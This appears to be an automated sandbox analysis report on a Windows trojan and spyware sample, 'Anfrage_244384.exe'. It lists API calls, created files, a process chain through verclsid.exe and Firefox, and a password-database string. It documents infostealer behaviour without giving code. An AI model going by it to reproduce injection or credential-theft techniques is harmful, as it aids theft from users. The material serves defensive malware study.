Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EA0 NtAdjustPrivilegesToken,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F60 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F90 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FA0 NtQuerySection,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AB0 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B80 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3010 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3090 NtSetValueKey,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D70 NtOpenThread,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D3D10 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D8F80 NtCreateFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D90F0 NtReadFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D91F0 NtDeleteFile,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D9290 NtClose,
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003D93F0 NtAllocateVirtualMemory,

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Windows\resources\soenderbro.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00404959
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_0040655F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 0_2_00406D36
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34671460
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F43F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737571
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5630
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473F0E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347370E9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346870C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F0CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B516C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F172
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B16B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468B1B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FCF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737D73
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34731D5A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FDC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689EB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FF09
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34643FD2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FFB1
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681F92
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED800
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346838E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34689950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469B950
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34715910
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3A6C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34737A46
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FA49
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472DAC6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C5AA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34721AA3
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471DAAC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473FB76
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346BDBF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F5BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FB80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34732446
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34724420
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472E4F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680535
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34740591
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469C6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680770
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A4750
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467C7C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34712000
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34708158
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670100
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471A118
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347381CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347341A2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347401AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720274
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347002C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473A352
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347403E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468E3F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34670CF2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34720CB5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468AD00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471CD1F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467ADE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34698DBF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34680E59
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EE26
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473EEDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473CE93
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34692E90
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F4F40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34722F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346C2F28
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A0F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468CFE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34672FC8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FEFA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468A840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34682840
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AE8F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346668B8
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34696962
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346829A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474A9A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467EA80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473AB40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34736BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04652446
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04644420
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464E4F6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0535
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04660591
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BC6E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C4750
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0770
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459C7C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04632000
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04628158
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590100
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463A118
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046581CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046601AA
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640274
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046202C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465A352
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046603E6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AE3F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0C00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04590CF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04640CB5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AAD00
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463CD1F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459ADE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B8DBF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A0E59
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EE26
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465EEDB
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B2E90
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465CE93
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04614F40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04642F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045C0F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E2F28
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04592FC8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045ACFE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0461EFA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A2840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AA840
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045CE8F0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045868B8
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045B6962
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466A9A6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A29A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0459EA80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465AB40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04656BD7
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04591460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F43F
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657571
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463D5B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046516CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F7B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465F0E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046570E9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A70C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464F0CC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0466B16B
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458F172
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D516C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045AB1B0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_046412ED
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB2C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A52A0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0458D34C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465132D
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E739A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04619C32
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FCF2
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657D73
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A3D40
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04651D5A
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFDC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9EB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FF09
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A1F92
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FFB1
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0460D800
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A38E0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045A9950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BB950
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04635910
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04613A6C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04657A46
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FA49
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0464DAC6
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04641AA3
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0463DAAC
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045E5AA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_0465FB76
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_04615BF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045DDBF9
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045BFB80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C1BC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCAC0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BCCE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAD60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003BAEA4
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003B1122
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C5220
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003C3460
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_003DB8C0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE65C
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE7EF
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BD728
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE1A5
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_048BE2C3

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045D5130 appears 58 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 045E7E54 appears 102 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0460EA12 appears 86 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0458B970 appears 280 times
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: String function: 0461F290 appears 105 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346EEA12 appears 82 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 3466B970 appears 280 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346C7E54 appears 103 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346B5130 appears 58 times
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: String function: 346FF290 appears 103 times

Source: Anfrage_244384.exe

Static PE information: invalid certificate

Source: Anfrage_244384.exe, 00000004.00000003.2992504596.0000000034403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.00000000043DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000003.2995103933.00000000345BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3092495841.0000000004423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameverclsid.exej% vs Anfrage_244384.exe
Source: Anfrage_244384.exe, 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage_244384.exe

Source: Anfrage_244384.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/11@2/2

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Roaming\secretaryships

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File created: C:\Users\user\AppData\Local\Temp\nsgA5D8.tmp

Jump to behavior

Source: Anfrage_244384.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: verclsid.exe, 00000007.00000003.3288960229.0000000000855000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3288960229.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3361368137.0000000000876000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.3291082475.0000000000881000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Anfrage_244384.exe

File read: C:\Users\user\Desktop\Anfrage_244384.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: ncrypt.dll
